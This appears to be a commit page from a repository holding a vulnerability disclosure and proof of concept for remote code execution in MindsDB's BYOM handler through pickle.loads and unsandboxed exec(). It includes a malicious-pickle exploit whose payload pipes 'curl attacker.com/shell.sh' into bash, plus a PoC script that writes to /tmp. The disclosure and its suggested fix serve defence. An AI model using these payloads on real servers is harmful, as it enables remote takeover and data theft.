vellaveto
/

mindsdb-byom-rce

Model card Files Files and versions

xet

Community

vellaveto commited on Mar 21

Commit

fda4aa3

verified ·

1 Parent(s): b093227

PoC: MindsDB BYOM Handler — pickle.loads + exec() RCE

Browse files

Files changed (2) hide show

README.md +136 -0
poc.py +29 -0

README.md ADDED Viewed

	@@ -0,0 +1,136 @@

+# MindsDB — RCE via `pickle.loads()` in BYOM (Bring Your Own Model) Handler
+## Vulnerability Type
+CWE-502: Deserialization of Untrusted Data
+## Severity
+Critical — Any user who can create a BYOM model achieves Remote Code Execution on the MindsDB server.
+## Affected Code
+**File:** `mindsdb/integrations/handlers/byom_handler/byom_handler.py`
+Three functions deserialize user-controlled model state:
+```python
+# Line 398 — predict()
+def predict(self, df, model_state, args):
+    model_state = pickle.loads(model_state)  # ← RCE
+    self.model_instance.__dict__ = model_state
+# Line 407 — finetune()
+def finetune(self, df, model_state, args):
+    self.model_instance.__dict__ = pickle.loads(model_state)  # ← RCE
+# Line 419 — describe()
+def describe(self, model_state, attribute=None):
+    model_state = pickle.loads(model_state)  # ← RCE
+    self.model_instance.__dict__ = model_state
+```
+**Also affected:**
+`mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:55`:
+```python
+model_state = pickle.loads(model_state)  # subprocess wrapper
+```
+`mindsdb/interfaces/query_context/context_controller.py:275`:
+```python
+steps_data = pickle.loads(data)  # from cache
+```
+`mindsdb/integrations/libs/process_cache.py:45`:
+```python
+# IPC via pickle — exception propagation
+```
+## Attack Chain
+1. **Attacker creates a BYOM model** via MindsDB SQL:
+```sql
+CREATE MODEL pwned
+PREDICT target
+USING engine='byom',
+      code='class Model: pass';
+```
+2. **The model's `train()` returns `pickle.dumps(self.__dict__)`** — but an attacker who controls the model code can override `__dict__` to contain a malicious pickle payload
+3. **When `predict()` is called** (e.g., `SELECT * FROM pwned WHERE ...`), the server deserializes the model state with `pickle.loads(model_state)` → arbitrary code execution
+### Alternative: Direct state injection
+If the attacker has access to the MindsDB storage backend (database), they can directly replace the model state bytes with a malicious pickle:
+```python
+import pickle, os
+class Exploit:
+    def __reduce__(self):
+        return (os.system, ('curl attacker.com/shell.sh | bash',))
+malicious_state = pickle.dumps(Exploit())
+# Insert into model storage → next predict() = RCE
+```
+## AI Impact (10x Multiplier)
+MindsDB is an AI-in-database platform. The BYOM handler is specifically designed for users to bring custom ML models. Compromising it enables:
+- **Model poisoning** — replace legitimate model with backdoored version
+- **Training data exfiltration** — RCE gives access to all data MindsDB has access to
+- **Database compromise** — MindsDB connects to user databases (MySQL, PostgreSQL, etc.), RCE gives access to all connected data sources
+- **Supply chain** — poisoned model persists across restarts and affects all queries
+## Known CVE Context
+MindsDB has prior deserialization CVEs (CVE-2024-45846, CVE-2024-45847 — eval injection via Weaviate integration). This BYOM pickle.loads is a different, previously unreported vector.
+## Suggested Fix
+Replace `pickle.loads` with a safe alternative:
+```python
+import json
+import jsonpickle
+def predict(self, df, model_state, args):
+    # Use JSON-based deserialization instead of pickle
+    model_state = json.loads(model_state)
+    # Or use restricted unpickler:
+    # model_state = RestrictedUnpickler(io.BytesIO(model_state)).load()
+    self.model_instance.__dict__ = model_state
+```
+## Invariant Violated
+S16 (DeserializationGuard): Application MUST NOT use `pickle.loads` on data from user-controlled or shared storage.
+## Additional Finding: Direct `exec()` on User Model Code
+**File:** `mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80`
+```python
+def import_string(code, module_name='model'):
+    module = types.ModuleType(module_name)
+    exec(code, module.__dict__)  # ← Direct code execution, NO sandbox
+    return module
+```
+This is the execution path for BYOM models. When a user creates a model with `engine='byom'`, their Python code is passed to `import_string()` which calls `exec()` with no sandboxing, no AST filtering, no import restrictions.
+The same file also uses `pickle.loads()` for IPC (stdin/stdout between parent and worker):
+```python
+def decode(encoded):
+    return pickle.loads(encoded)  # Line 55
+def get_input():
+    with open(0, 'rb') as fd:
+        encoded = fd.read()
+        obj = decode(encoded)  # pickle.loads on stdin
+```
+### Combined Chain
+1. User creates BYOM model with malicious code → `exec(code)` → RCE
+2. Even if exec were sandboxed, the pickle IPC channel is unprotected → pickle.loads bypass
+This is a **defense-in-depth failure** — two independent RCE vectors in the same module.

poc.py ADDED Viewed

	@@ -0,0 +1,29 @@

+"""MindsDB BYOM Handler — pickle.loads RCE PoC
+The BYOM (Bring Your Own Model) handler deserializes user-uploaded
+model state via pickle.loads() without any safety checks.
+Affected: mindsdb/integrations/handlers/byom_handler/byom_handler.py:398
+Also: mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80 (exec on user code)
+"""
+import pickle
+import os
+class MaliciousModel:
+    """When this object is unpickled, it executes arbitrary code."""
+    def __reduce__(self):
+        return (os.system, ('id > /tmp/pwned',))
+# This is what happens when a user creates a BYOM model
+# The model state is pickle.dumps'd during train() and pickle.loads'd during predict()
+malicious_state = pickle.dumps(MaliciousModel())
+print(f"Malicious pickle payload: {len(malicious_state)} bytes")
+print("When MindsDB calls predict() on this model, pickle.loads(model_state) triggers RCE")
+print()
+print("Attack chain:")
+print("1. CREATE MODEL pwned USING engine='byom', code='<malicious model code>'")
+print("2. SELECT * FROM pwned WHERE input='test'  -- triggers predict()")
+print("3. predict() calls pickle.loads(model_state) → RCE")
+print()
+print("Additionally, proc_wrapper.py:80 calls exec(code) on the model code directly")